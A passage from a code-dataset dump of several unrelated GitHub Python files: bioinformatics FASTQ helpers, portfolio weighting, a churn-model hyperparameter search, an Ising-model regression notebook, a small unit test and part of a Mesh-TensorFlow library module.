self.right.printrightnodes()\n\n def height(self):\n if self.data is None:\n return 0\n else:\n return (max(self.left.height()+1, self.right.height()+1))\n\n\n","repo_name":"shubhankar01/Python-Datastructures","sub_path":"tree/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22348610725","text":"#!/usr/bin/env python\n\n\"\"\"\nModuleVelo.py - Tasks for running single cell velocyto pipeline.\n\n\"\"\"\nimport os\nimport cgatcore.pipeline as P\n\n\ndef check_paired_end(fastqfiles):\n \"checks if data is paired end or single end\"\n fastqfile1 = []\n fastqfile2 = []\n for fastqfile in fastqfiles:\n if fastqfile.endswith(\".fastq.2.gz\"):\n bn = P.snip(fastqfile, \".fastq.2.gz\")\n infile1 = \"%s.fastq.1.gz\" % bn\n infile2 = \"%s.fastq.2.gz\" % bn\n if not os.path.exists(infile1):\n raise ValueError(\"cant find paired end file \"\n\t \"'%s' for '%s'\" % (infile1, infile2))\n fastqfile1.append(infile1)\n fastqfile2.append(infile2)\n else:\n raise ValueError(\"Alevin requires UMI/CB file and reads file\")\n\n fastqfiles = [fastqfile1, fastqfile2]\n return(fastqfiles)\n\ndef check_multiple_read_files(infiles):\n if isinstance(infiles[0], tuple):\n index = infiles[0][1]\n\n fastqs = [x[0] for x in infiles]\n\n else:\n fastqs = [infiles[0]]\n index = infiles[1]\n\n output = [fastqs, index]\n return(output)\n\ndef check_multiple_read_files_no_index(infiles):\n if isinstance(infiles, tuple):\n fastqs = [x for x in infiles]\n\n else:\n fastqs = [infiles]\n\n\n output = fastqs\n return(output)\n","repo_name":"cribbslab/scflow","sub_path":"scpipelines/ModuleVelo.py","file_name":"ModuleVelo.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"70"}
+{"seq_id":"13035994816","text":"import numpy as np\nimport pandas as pd\n\nclass RiskPortfolio():\n def __init__(self, sigma):\n dim = sigma.shape[0]\n self.w_equaly_weighted = self.equaly_weighted(dim)\n self.w_inv_variance = self.inv_variance(sigma, dim)\n self.w_min_variance = self.min_variance(sigma, dim)\n\n def equaly_weighted(self, dim):\n identity = np.identity(dim)\n ones = np.ones((dim, 1))\n \n return (identity @ ones)/(ones.T @ identity @ ones)\n\n def inv_variance(self, sigma, dim):\n lambda_ = np.diag(np.diag(sigma))\n lambda_2 = lambda_ ** 2\n ones = np.ones((dim, 1))\n\n return (np.linalg.inv(lambda_2) @ ones)/ (ones.T @ np.linalg.inv(lambda_2) @ ones)\n\n def min_variance(self, sigma, dim):\n ones = np.ones((dim, 1))\n\n return (np.linalg.inv(sigma) @ ones) / (ones.T @ np.linalg.inv(sigma) @ ones)\n \n def get_weights(self, type):\n if type == 'Min Variance':\n return self.w_min_variance\n elif type == 'Inv Variance':\n return self.w_inv_variance\n elif type == 'Equally Weighted':\n return self.w_equaly_weighted\n else:\n print('Not a Valid Type. You can try one of the following: Min Variance, Inv Variance, Equally Weighted')\n return None\n\n'''\nfrom mu import *\nfrom sigma import *\nfrom dataloader import *\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\ntickers = ['AAPL', 'GOOG', 'IBM', 'TSLA', 'BLK', 'AMZN', 'COTY', 'PFE']\nperiod = '12mo'\nrebalancing_freq = 5*21\ndata = Dataloader(period, tickers, rebalancing_freq)\ndates, tickers_close_info = data.get_close()\nclose_returns = pd.DataFrame()\ni = 0\ns = {}\nVaR_1mo_95 = {}\nfor close_df in tickers_close_info:\n\n tickers_close_returns = (close_df/close_df.shift(1)).dropna() - 1\n sigma = Sigma(tickers_close_returns,rebalancing_freq).get_sigma()\n\n if i > 0:\n\n risk_inv_df = (tickers_close_returns.multiply(risk__weights_inv)).sum(axis = 1)\n\n risk_min_df = (tickers_close_returns.multiply(risk__weights_min)).sum(axis = 1)\n\n risk_eq_df = (tickers_close_returns.multiply(risk__weights_eq)).sum(axis = 1)\n\n tickers_close_returns['Portfolio Risk Inverse Variance'] = risk_inv_df\n tickers_close_returns['Portfolio Risk Min Variance'] = risk_min_df\n tickers_close_returns['Portfolio Risk Equally Weighted'] = risk_eq_df\n\n tickers_close_returns.dropna(axis = 0, inplace = True)\n close_returns = close_returns.append(tickers_close_returns)\n\n else:\n i = 1\n \n risk_ = RiskPortfolio(sigma)\n risk__weights_inv = np.transpose(risk_.get_weights('Inv Variance'))[0]\n risk__weights_min = np.transpose(risk_.get_weights('Min Variance'))[0]\n risk__weights_eq = np.transpose(risk_.get_weights('Equally Weighted'))[0]\n\nportfolios = ['Portfolio Risk Inverse Variance', 'Portfolio Risk Min Variance', 'Portfolio Risk Equally Weighted']\nfor p in portfolios:\n s[p] = (np.mean(close_returns[p])/np.std(close_returns[p]))\n VaR_1mo_95[p] = np.mean(close_returns[p]) - 1.65 * np.sqrt(21) * np.std(close_returns[p])\n# close_returns = (close_returns + 1).cumprod(axis = 0)\n# close_returns[['Portfolio Risk Inverse Variance', 'Portfolio Risk Min Variance', 'Portfolio Risk Equally Weighted']].plot()\n# plt.ylabel('Cummulative Returns') \n# plt.suptitle('Minimum Variance Portfolio Performance')\n# plt.show()\n\ndf = pd.DataFrame([VaR_1mo_95, s], index = ['VaR 95 at 1mo horizon', 'Sharpe Ratio']).T\nprint(df.to_latex())\n'''","repo_name":"felipe-fp/portfolio_optimization","sub_path":"risk_portfolio.py","file_name":"risk_portfolio.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"36286202657","text":"\"\"\"\n This script performs Randomized Grid Search CV for customer churn model\n\n Dependencies:\n ../model_data_prep/model_data_prep.py\n ../model_data_prep/model_data_eda_and_feature_engg.ipynb\n ../model_data_prep/data_cleaning_and_data_split.ipynb\n data_downsampling.py\n\"\"\"\n\n# Load packages\nfrom pathlib import Path\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nimport xgboost as xgb\nimport lightgbm as lgb\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.metrics import f1_score, roc_auc_score, log_loss\nimport mlflow\nimport time\nimport joblib\n\n\ndef load_data_function():\n \"\"\"\n Function to load model data\n \"\"\"\n # Load train dataset\n data_folder = Path.cwd().parents[0].joinpath('data', 'processed_data')\n x_train = np.load(data_folder.joinpath('x_train_onehot_downsampled.npy'))\n y_train = np.load(data_folder.joinpath('y_train_downsampled.npy'))\n\n # Load validation dataset\n x_val = np.load(data_folder.joinpath('x_val_onehot_encode.npy'))\n y_val = np.load(data_folder.joinpath('y_val.npy'))\n\n # Scale data\n data_scaler = StandardScaler()\n data_scaler.fit(x_train)\n x_train_scaled = data_scaler.transform(x_train)\n x_val_scaled = data_scaler.transform(x_val)\n\n # Load numeric encoded dataset\n x_train_2 = np.load(data_folder.joinpath('x_train_num_downsampled.npy'))\n x_val_2 = np.load(data_folder.joinpath('x_val_num_encode.npy'))\n\n return x_train, x_train_2, x_train_scaled, x_val, x_val_2, x_val_scaled, y_train, y_val\n\n\ndef main():\n # Load model data\n x_train, x_train_2, x_train_scaled, x_val, x_val_2, x_val_scaled, y_train, y_val = load_data_function()\n\n # Initialize models\n models_dict = {\n 'Logistic_Regression': LogisticRegression(random_state=1),\n 'XGBoost': xgb.XGBClassifier(random_state=2, use_label_encoder=False, n_jobs=-1),\n 'LightGBM': lgb.LGBMClassifier(random_state=3, n_jobs=-1)\n }\n\n # Create a dict of parameters to be tuned\n model_params_dict = {'Logistic_Regression': [{'penalty': ['l2'], 'C': [1.0, 0.5]},\n {'penalty': ['l1'], 'C': [1.0, 0.5], 'solver': ['liblinear']}],\n 'RandomForestClassifier': {'n_estimators': [100, 250, 500, 1000],\n 'criterion': ['gini', 'entropy'],\n 'min_samples_split': [2, 5, 10, 25, 50],\n 'min_samples_leaf': [1, 5, 10, 25]},\n 'XGBoost': {'n_estimators': [100, 500, 1000], 'max_depth': [3, 5, 10],\n 'learning_rate': [0.5, 0.1, 0.01, 0.001], 'subsample': [0.6, 0.8, 1.0]},\n 'LightGBM': {'boosting_type': ['gbdt', 'goss'], 'learning_rate': [0.001, 0.01, 0.1],\n 'max_depth': [3, 5, 10, 50], 'n_estimators': [50, 100, 500, 1000],\n 'subsample': [1, 0.8], 'reg_alpha': [0, 0.5], 'reg_lambda': [0, 0.5],\n 'min_data_in_leaf': [100, 500, 1000], 'num_leaves': [6, 24, 500]}}\n\n # Choose train dataset\n model_data = {'Logistic_Regression': 'x_train_scaled',\n 'XGBoost': 'x_train',\n 'RandomForestClassifier': 'x_train',\n 'LightGBM': 'x_train_2'\n }\n\n # Choose validation dataset\n val_data = {'Logistic_Regression': 'x_val_scaled',\n 'XGBoost': 'x_val',\n 'RandomForestClassifier': 'x_val',\n 'LightGBM': 'x_val_2'}\n\n # Create a dict for grid search\n models_grid_search = dict()\n\n start_time = time.time()\n\n for model in models_dict.items():\n print(f\"Running {model[0]}\")\n # Start mlflow run\n with mlflow.start_run(run_name=\"Grid search: \" + model[0]):\n models_grid_search[model[0]] = RandomizedSearchCV(estimator=model[1],\n param_distributions=model_params_dict[model[0]],\n n_iter=50,\n scoring=['neg_log_loss', 'f1', 'roc_auc'],\n cv=5,\n refit='f1',\n verbose=3)\n\n if model[0] == \"LightGBM\":\n models_grid_search[model[0]].fit(eval(model_data[model[0]]), y_train,\n categorical_feature=[eval(model_data[model[0]]).shape[1]-1]\n )\n else:\n models_grid_search[model[0]].fit(eval(model_data[model[0]]), y_train)\n\n # Get best cv score\n mean_cv_score = np.mean(models_grid_search[model[0]].best_score_)\n std_cv_score = np.std(models_grid_search[model[0]].best_score_)\n\n # Get scores for validation data\n val_pred_prob = models_grid_search[model[0]].best_estimator_.predict_proba(eval(val_data[model[0]]))[:, -1]\n val_f1_score = f1_score(y_val,\n models_grid_search[model[0]].best_estimator_.predict(eval(val_data[model[0]])))\n val_roc_score = roc_auc_score(y_val, val_pred_prob)\n val_log_loss = log_loss(y_val, val_pred_prob)\n\n # Log metrics\n mlflow.log_metrics({'mean_cv_f1_score': mean_cv_score,\n 'std_cv_f1_score': std_cv_score,\n 'validation_f1_score': val_f1_score,\n 'validation_auc_roc': val_roc_score,\n 'validation_log_loss': val_log_loss})\n\n # Store the best models\n Path.cwd().parents[0].joinpath('saved_models_randomized_cv_search').mkdir(parents=True, exist_ok=True)\n joblib.dump(models_grid_search[model[0]],\n Path.cwd().parents[0].joinpath('saved_models_randomized_cv_search',\n model[0].lower() + '.joblib'))\n\n print(f\"Run time: {np.round(time.time() - start_time, 4)}\")\n print(\"Finished modelling\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nithishkaviyan/customer_churn_prediction","sub_path":"modelling/grid_search_cv_models.py","file_name":"grid_search_cv_models.py","file_ext":"py","file_size_in_byte":6541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14060198864","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# %%\n\nnp.random.seed(12)\n\n# define Ising model aprams\n# system size\nL = 40\nN = 600\n\n# create 10000 random Ising states\nstates = np.random.choice([-1, 1], size=(N, L))\n\n\ndef ising_energies(states):\n \"\"\"\n This function calculates the energies of the states in the nn Ising Hamiltonian\n \"\"\"\n L = states.shape[1]\n J = np.zeros((L, L))\n for i in range(L):\n J[i, (i + 1) % L] = -1.0 # interaction between nearest-neighbors\n\n # compute energies\n E = np.einsum('...i,ij,...j->...', states, J, states)\n\n return E\n\n\n# calculate Ising energies\nenergies = ising_energies(states)\nenergies\n#%%\nJ = np.zeros((L, L))\nJ\n# %%\n# reshape Ising states into RL samples: S_iS_j --> X_p\nstates = np.einsum('...i,...j->...ij', states, states)\nshape = states.shape\nshape\n#%%\nstates = states.reshape((shape[0], shape[1] * shape[2]))\n# build final data set\nData = np.c_[states, energies.reshape(N,1)]\nstates\n#%%\na=np.array([[[1,2,4,7,3],[2,1,4,2,6]]])\na.shape[2]\n\n#%%\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ndf1 = pd.DataFrame(Data)\ntrain_set, test_set = train_test_split(df1, test_size=0.2, random_state=42)\ntrain_set\n#%%\ndata_spins = train_set.drop([1600], axis=1, inplace=False)\ndata_label = train_set[1600].copy()\n#%%\ndata_spins, data_label\n#%%\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import cross_val_score, GridSearchCV\nfrom sklearn.linear_model import Ridge, Lasso, SGDRegressor\n\n#%%\nlin_reg = LinearRegression()\nlin_reg.fit(data_spins, data_label)\n#%%\nlin_reg.get_params()\n#%%\n#prediction = lin_reg.predict([data_spins.iloc[20]])\n#prediction\n#data_label.iloc[20]\n#%%\n#lin_predict = lin_reg.predict(data_spins)\n#lin_mse = mean_squared_error(lin_predict, data_label)\n#lin_mse\n#%%\nridge_reg = Ridge() # alpha=1\n#ridge_reg.get_params()\nridge_reg.fit(data_spins, data_label)\npredict = ridge_reg.predict(data_spins)\nridg_mse = mean_squared_error(predict, data_label)\nridg_mse\n#%%\n# Seems we have overfitting, It could be solved, first, let us examine it with cross_val_score\n#%%\nridge_score = cross_val_score(ridge_reg, data_spins, data_label,\n scoring='neg_mean_squared_error',\n cv=5)\nprint(-ridge_score)\nridge_rmse = np.sqrt(-ridge_score)\nridge_rmse\n#%% It shows high mse, let's use hyperparameter tuning\n#%%\nparam_grid = [{\n 'alpha' : np.logspace(-4, 5, 10),\n #'copy_X': True, 'fit_intercept': True,\n #'max_iter': None, 'normalize': False, 'random_state': None\n }]\n\ngrid_search_ridge = GridSearchCV(ridge_reg, param_grid, cv=3,\n scoring='neg_mean_squared_error',\n return_train_score=True)\ngrid_search_ridge.fit(data_spins, data_label)\n#%%\ngrid_search_ridge.best_params_\n#%%\nridge_model = grid_search_ridge.best_estimator_\nridge_score = cross_val_score(ridge_model, data_spins, data_label,\n scoring='neg_mean_squared_error',\n cv=5)\nridge_rmse = np.sqrt(-ridge_score)\nridge_rmse\n#%%\nprint(grid_search_ridge.best_params_)\n#%%\nridge_model = grid_search_ridge.best_estimator_\nj_ridge = ridge_model.coef_\nj_ridge\n#%%\n#cmaps['Perceptually Uniform Sequential'] = [\n# 'viridis', 'plasma', 'inferno', 'magma', 'cividis']\n#\n#cmaps['Sequential'] = [\n# 'Greys', 'Purples', 'Blues', 'Greens', 'Oranges', 'Reds',\n# 'YlOrBr', 'YlOrRd', 'OrRd', 'PuRd', 'RdPu', 'BuPu',\n# 'GnBu', 'PuBu', 'YlGnBu', 'PuBuGn', 'BuGn', 'YlGn']\n\nplt.imshow(j_ridge.reshape(L, L), #cmap='YlOrRd'\n )\nplt.title(r\"Ridge $\\alpha=0.0001$\")\nplt.show()\n\n#%%\nridge_reg.get_params()\n#%%\nlasso_reg = Lasso() # alpha=1\nparam_grid = [{\n 'alpha' : np.logspace(-4, 5, 10),\n #'copy_X': True, 'fit_intercept': True,\n #'max_iter': None, 'normalize': False, 'random_state': None\n }]\n\ngrid_search_lasso = GridSearchCV(lasso_reg, param_grid, cv=3,\n scoring='neg_mean_squared_error',\n return_train_score=True)\ngrid_search_lasso.fit(data_spins, data_label)\n#%%\ngrid_search_lasso.best_params_\n#%%\nlasso_model = grid_search_lasso.best_estimator_\nj_lasso = lasso_model.coef_\nj_lasso\n#%%\nplt.imshow(j_lasso.reshape(L, L))\nplt.title(r\"LASSO $\\alpha=0.001$\")\nplt.show()\n#%%\nfinal_lasso_model = grid_search_lasso.best_estimator_\nlasso_best_score = cross_val_score(final_lasso_model, data_spins, data_label,\n scoring='neg_mean_squared_error',\n cv=5)\nlasso_best_rmse = np.sqrt(-lasso_best_score)\nlasso_best_rmse\n#%%","repo_name":"mohammadreza-ebrahimi/1D-Ising-model","sub_path":"1d-ising.py","file_name":"1d-ising.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29048467133","text":"\n\ndef test__consensus_deciders():\n from src.utils.consensus_decider import ConsensusDecider\n\n test1 = ConsensusDecider()\n test1.put(\"a\", 1)\n test1.put(\"b\", 1)\n test1.put(\"b\", 1)\n assert test1.arbitrate() == \"b\"\n\n assert test1.has_majority()\n\n test2 = ConsensusDecider()\n test2.put(\"a\", 3)\n test2.put(\"b\", 1)\n test2.put(\"b\", 1)\n assert test2.arbitrate() == \"a\"\n\n test2.put(\"b\", 1)\n assert not test2.has_majority()\n test2.put(\"b\", 1)\n assert test2.has_majority()\n\n test3 = ConsensusDecider()\n test3.put(\"a\", 1000)\n assert test3.arbitrate() == \"a\"\n\n test4 = ConsensusDecider()\n test4.put(\"a\", 1000)\n assert test4.has_majority()\n\n test4.put(\"b\", 1000)\n test4.put(\"c\", 1000)\n\n # assert not test4.has_majority()\n\n test5 = ConsensusDecider()\n assert test5.arbitrate() is None\n assert not test5.has_majority()\n\n\n","repo_name":"jovialis/vu-course-planner","sub_path":"functions/tests/test_consensus_decider.py","file_name":"test_consensus_decider.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"6691150917","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nfrom functools import reduce # pylint: disable=redefined-builtin; for py3\nfrom operator import mul\nimport re\nimport six\nfrom six.moves import xrange # pylint: disable=redefined-builtin\n\nfrom tensor2tensor.mesh_tensorflow import mtf_utils\nimport tensorflow as tf\n\n\nDimension = collections.namedtuple(\"Dimension\", [\"name\", \"size\"])\n\n\ndef convert_to_dimension(d):\n \"\"\"Converts input to a Dimension.\n\n Args:\n d: Dimension, tuple (string, int), or None.\n\n Returns:\n Dimension or None.\n\n Raises:\n ValueError: If d cannot be converted to a Dimension.\n \"\"\"\n if d is None:\n return None\n if isinstance(d, Dimension):\n return d\n name, size = d\n if isinstance(name, str) and isinstance(size, int):\n return Dimension(name, size)\n else:\n raise ValueError(\"could not convert %s to Dimension\" % (d,))\n\n\nclass Shape(object):\n \"\"\"Shape of a Tensor or Mesh.\n\n #### Examples\n\n ```python\n # Create shape [4, 8] with names \"x\" and \"y\" respectively.\n shape = mtf.Shape([mtf.Dimension(\"x\", 4), mtf.Dimension(\"y\", 8)])\n ```\n \"\"\"\n\n def __init__(self, dims):\n \"\"\"Constructs a shape for a Tensor or Mesh.\n\n Args:\n dims: List-like of Dimensions.\n\n Raises:\n ValueError: If Dimensions are repeated.\n \"\"\"\n self._dims = [convert_to_dimension(d) for d in tuple(dims)]\n if len(set(dims)) != len(dims):\n raise ValueError(\"Shape must not have repeated dimensions %s\" % dims)\n\n @property\n def dims(self):\n return list(self._dims)\n\n @property\n def ndims(self):\n return len(self._dims)\n\n def __repr__(self):\n return self.to_string\n\n def __eq__(self, other):\n return self.dims == other.dims\n\n def __ne__(self, other):\n return self.dims != other.dims\n\n def __add__(self, other):\n if isinstance(other, Shape):\n other = other.dims\n if isinstance(other, Dimension):\n other = [other]\n return Shape(self.dims + other)\n\n def __sub__(self, other):\n if other is None:\n return self\n if isinstance(other, Shape):\n other = other.dims\n if isinstance(other, Dimension):\n other = [other]\n return Shape([d for d in self.dims if d not in other])\n\n def __len__(self):\n return len(self._dims)\n\n def __getitem__(self, key):\n return self._dims[key]\n\n def __iter__(self):\n return iter(self._dims)\n\n @property\n def to_integer_list(self):\n return [d.size for d in self.dims]\n\n @property\n def size(self):\n return list_product(self.to_integer_list)\n\n @property\n def to_string(self):\n return \"Shape[%s]\" % \", \".join(\n [\"%s=%d\" % (d.name, d.size) for d in self.dims])\n\n @property\n def cumprod(self):\n \"\"\"Cumulative product (exclusive) of Dimension sizes.\"\"\"\n return _cumprod(self.to_integer_list)[::-1]\n\n def cumprod_to_tensor_axis(self, cumprod):\n \"\"\"Tensor axis i such that self.cumprod[i] == cumprod, or None.\"\"\"\n try:\n return self.cumprod.index(cumprod)\n except ValueError:\n return None\n\n @property\n def dimension_names(self):\n return [d.name for d in self.dims]\n\n def rename_dimension(self, old_name, new_name):\n \"\"\"Returns a copy where one dimension is renamed.\"\"\"\n if old_name not in self.dimension_names:\n raise ValueError(\"Shape %s does not have dimension named %s\"\n % (self, old_name))\n return Shape(\n [Dimension(new_name, d.size) if d.name == old_name else d\n for d in self.dims])\n\n def resize_dimension(self, name, new_size):\n \"\"\"Returns a copy where one dimension has a different size.\"\"\"\n if name not in self.dimension_names:\n raise ValueError(\"Shape %s does not have dimension named %s\"\n % (self, name))\n return Shape(\n [Dimension(name, new_size) if d.name == name else d\n for d in self.dims])\n\n\ndef convert_to_shape(x):\n \"\"\"Converts input to a Shape.\n\n Args:\n x: Shape, str, or None.\n\n Returns:\n Shape or None.\n\n Raises:\n ValueError: If x cannot be converted to a Shape.\n \"\"\"\n if x is None:\n return None\n if isinstance(x, Shape):\n return x\n if isinstance(x, str):\n x = _parse_string_to_list_of_pairs(x, seconds_to_int=True)\n return Shape(x)\n\n\nclass LayoutRules(object):\n \"\"\"Represents layout of a computation.\n\n #### Examples\n\n ```python\n # Map \"d_ff\" and \"heads\" Tensor Dimensions to the \"model\" Mesh Dimension.\n layout_rules = mtf.LayoutRules([(\"d_ff\", \"model\"), (\"heads\", \"model\")])\n ```\n \"\"\"\n\n def __init__(self, pairs):\n \"\"\"Constructs a layout.\n\n Args:\n pairs: Set-like of string pairs (tensor_dim_name, mesh_dim_name).\n \"\"\"\n self._pairs = set(pairs)\n\n def __repr__(self):\n return \"LayoutRules%s\" % self._pairs\n\n def tensor_dimension_to_mesh_axis(self, tensor_dimension, mesh_shape):\n \"\"\"Mesh axis associated with tensor dimension (or None).\n\n Args:\n tensor_dimension: Dimension.\n mesh_shape: Shape.\n\n Returns:\n Integer or None.\n\n Raises:\n ValueError: If one Tensor dimension maps to two mesh dimensions.\n \"\"\"\n val = [i for i, mesh_dimension in enumerate(mesh_shape)\n if (tensor_dimension.name, mesh_dimension.name) in self._pairs]\n if len(val) > 1:\n raise ValueError(\n \"Tensor dimension maps to multiple mesh dimensions\"\n \" tensor_dimension=%s mesh_shape=%s layout=%s\"\n % (tensor_dimension, mesh_shape, self._pairs))\n return val[0] if val else None\n\n def tensor_layout(self, tensor_shape, mesh_shape):\n \"\"\"Computes TensorLayout given a Tensor Shape and a Mesh Shape.\n\n Args:\n tensor_shape: Shape.\n mesh_shape: Shape.\n\n Returns:\n TensorLayout.\n\n Raises:\n ValueError: If two Tensor Dimensions map to the same Mesh Dimensions.\n \"\"\"\n ret = [self.tensor_dimension_to_mesh_axis(d, mesh_shape)\n for d in tensor_shape]\n not_nones = [a for a in ret if a is not None]\n if len(not_nones) != len(set(not_nones)):\n raise ValueError(\n \"Two Tensor Dimensions may not map to the same Mesh Dimension:\"\n \" layout=%s tensor_shape=%s mesh_shape=%s \" %\n (self, tensor_shape, mesh_shape))\n return TensorLayout(ret)\n\n\ndef convert_to_layout_rules(x):\n \"\"\"Converts input to a LayoutRules.\n\n Args:\n x: LayoutRules, str, or set-like of string pairs.\n\n Returns:\n LayoutRules.\n \"\"\"\n if isinstance(x, LayoutRules):\n return x\n if isinstance(x, str):\n x = _parse_string_to_list_of_pairs(x)\n return LayoutRules(x)\n\n\nclass TensorLayout(object):\n \"\"\"Injective partial map between Tensor axes and Mesh axes.\n\n TensorLayout is a tuple of optional integers with length tensor.ndims. Each\n item is either a unique integer indicating the mesh axis over which that\n tensor dimension is split or None, indicating that this tensor dimension is\n not split.\n\n #### Examples\n\n ```python\n # Split first and last Tensor dimensions according to mesh axes 0 and 1.\n tensor_layout = mtf.TensorLayout([0, None, 1])\n ```\n \"\"\"\n\n def __init__(self, tensor_axis_to_mesh_axis):\n \"\"\"Creates a TensorLayout.\n\n Args:\n tensor_axis_to_mesh_axis: List-like where each element is an int or None.\n \"\"\"\n self._tensor_axis_to_mesh_axis = tuple(tensor_axis_to_mesh_axis)\n\n def __eq__(self, other):\n return self.tensor_axis_to_mesh_axis == other.tensor_axis_to_mesh_axis\n\n def __ne__(self, other):\n return self.tensor_axis_to_mesh_axis != other.tensor_axis_to_mesh_axis\n\n def __repr__(self):\n return \"TensorLayout%s\" % (self.tensor_axis_to_mesh_axis,)\n\n def __len__(self):\n return len(self._tensor_axis_to_mesh_axis)\n\n def __getitem__(self, key):\n return self._tensor_axis_to_mesh_axis[key]\n\n def __iter__(self):\n return iter(self._tensor_axis_to_mesh_axis)\n\n @property\n def tensor_axis_to_mesh_axis(self):\n \"\"\"Converts to a tuple of optional integers.\"\"\"\n return self._tensor_axis_to_mesh_axis\n\n @property\n def is_fully_replicated(self):\n \"\"\"Whether all tensor dimensions map to None.\"\"\"\n return self.tensor_axis_to_mesh_axis == (None,) * len(self)\n\n def mesh_axis_to_tensor_axis(self, mesh_ndims):\n \"\"\"For each mesh axis, which Tensor axis maps to it.\n\n Args:\n mesh_ndims: int.\n\n Returns:\n Tuple of optional integers, with length mesh_ndims.\n \"\"\"\n return tuple(\n [self._tensor_axis_to_mesh_axis.index(mesh_axis)\n if mesh_axis in self._tensor_axis_to_mesh_axis else None\n for mesh_axis in xrange(mesh_ndims)])\n\n\nclass Graph(object):\n \"\"\"Mesh-TensorFlow graph.\"\"\"\n\n def __init__(self):\n self._operations = []\n self._tensors = []\n self._trainable_variables = []\n self._all_variables = []\n\n def __repr__(self):\n return self.to_string\n\n @property\n def operations(self):\n return self._operations\n\n @property\n def tensors(self):\n return self._tensors\n\n @property\n def trainable_variables(self):\n return self._trainable_variables\n\n @property\n def all_variables(self):\n return self._all_variables\n\n @property\n def to_string(self):\n return \"\\n\".join([op.to_string for op in self.operations])\n\n\nclass Lowering(object):\n \"\"\"Lowering of a Graph from Mesh-TensorFlow to TensorFlow.\n\n #### Examples\n\n Below we form a Graph with one Tensor and lower it to recover the original\n tf.Tensor.\n\n ```python\n from tensor2tensor.mesh_tensorflow import placement_mesh_impl\n\n graph = mtf.Graph()\n mesh = mtf.Mesh(graph, \"my_mesh\")\n inputs = tf.constant(0.)\n mtf_inputs = mtf.import_tf_tensor(mesh,\n inputs=inputs,\n shape=mtf.Shape([]))\n mesh_impl = placement_mesh_impl.PlacementMeshImpl(\n shape=[], layout={}, devices=[\"\"])\n lowering = mtf.Lowering(graph, {mesh: mesh_impl})\n outputs = lowering.export_to_tf_tensor(mtf_inputs) # tf.constant(0.)\n ```\n \"\"\"\n\n def __init__(self, graph, mesh_to_impl):\n \"\"\"Creates a Lowering of a Graph.\n\n Args:\n graph: Graph.\n mesh_to_impl: {Mesh: MeshImpl}. Keys are the Mesh's in the graph and\n their values are MeshImpl's, which map Tensor Dimension names to\n Mesh Dimension names.\n \"\"\"\n # tf.logging.info(\"LOWERING GRAPH:\\n%s\" % graph.to_string)\n self.mesh_to_impl = mesh_to_impl # {Mesh: MeshImpl}\n self.graph = graph\n self._counters = []\n self.tensors = {} # {Tensor: Mesh.LaidOutTensor}\n self.operations = {} # {Operation: tf.Operation}\n self.variables = {} # {Variable: LaidOutVariable}\n for op in graph.operations:\n # tf.logging.info(\"Lowering operation %s\" % op.to_string)\n with tf.name_scope(op.name):\n op.lower(self)\n for out in op.outputs:\n self.add_counter(\n \"output/%s\" % type(op).__name__, self.laid_out_size(out))\n self.add_counter(\"output_unique/%s\" % type(op).__name__, out.size)\n log_variable_sizes(\n graph.trainable_variables, \"Trainable Variables\", verbose=True)\n tf.logging.info(\"Counters:\\n\" + pretty_print_counters(self._counters))\n\n def mesh_impl(self, m):\n if not isinstance(m, Mesh):\n m = m.mesh\n return self.mesh_to_impl[m]\n\n def export_to_tf_tensor(self, x):\n \"\"\"Turn a Tensor into a tf.Tensor.\n\n Args:\n x: Tensor.\n\n Returns:\n tf.Tensor.\n \"\"\"\n mesh_impl = self.mesh_impl(x)\n return mesh_impl.export_to_tf_tensor(\n x, self.tensors[x].to_laid_out_tensor())\n\n def lowered_operation(self, op):\n return self.operations[op]\n\n def copy_masters_to_slices(self):\n return tf.group(\n [v.copy_master_to_slices for v in six.itervalues(self.variables)])\n\n def copy_slices_to_masters(self):\n return tf.group(\n [v.copy_slices_to_master for v in six.itervalues(self.variables)])\n\n def add_counter(self, key, value):\n assert isinstance(value, int)\n self._counters.append((key, value))\n\n @property\n def counters(self):\n return self._counters\n\n def laid_out_size(self, tensor):\n \"\"\"Total size of all slices.\n\n Args:\n tensor: Tensor.\n\n Returns:\n int.\n \"\"\"\n return self.mesh_impl(tensor).laid_out_size(tensor.shape)\n\n def set_tensor_lowering(self, tensor, laid_out_tensor):\n self.verify_slice_shapes(tensor, laid_out_tensor)\n self.tensors[tensor] = laid_out_tensor\n\n def verify_slice_shapes(self, tensor, laid_out_tensor):\n mesh_impl = self.mesh_impl(tensor)\n correct_shape = mesh_impl.slice_shape(tensor.shape)\n actual_shape = laid_out_tensor.slice_shape\n if actual_shape != correct_shape:\n raise ValueError(\n \"Wrong slice shape: correct_shape = %s actual shape = %s\"\n % (correct_shape, actual_shape))\n\n\nclass Mesh(object):\n \"\"\"A placeholder with no functionality.\n\n A Graph is built with each Tensor assigned to a Mesh. The Mesh does not\n know its shape or its implementation.\n\n A Lowering assigns each Mesh to a MeshImpl.\n \"\"\"\n\n def __init__(self, graph, name):\n self._graph = graph\n self._name = name\n\n @property\n def graph(self):\n return self._graph\n\n\nclass MeshImpl(object):\n \"\"\"Implementation of a Mesh.\n\n Unlike Mesh, MeshImpl carries Shape and LayoutRules. Subclasses of MeshImpl\n also carry devices.\n\n #### Examples\n\n ```python\n shape = mtf.Shape([mtf.Dimension(\"batch\", 4),\n mtf.Dimension(\"model\", 8)])\n layout_rules = 